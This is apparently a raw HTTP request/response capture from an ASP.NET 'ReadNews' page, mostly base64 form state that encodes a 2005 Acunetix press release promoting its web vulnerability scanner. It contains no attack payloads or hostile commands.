ICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+P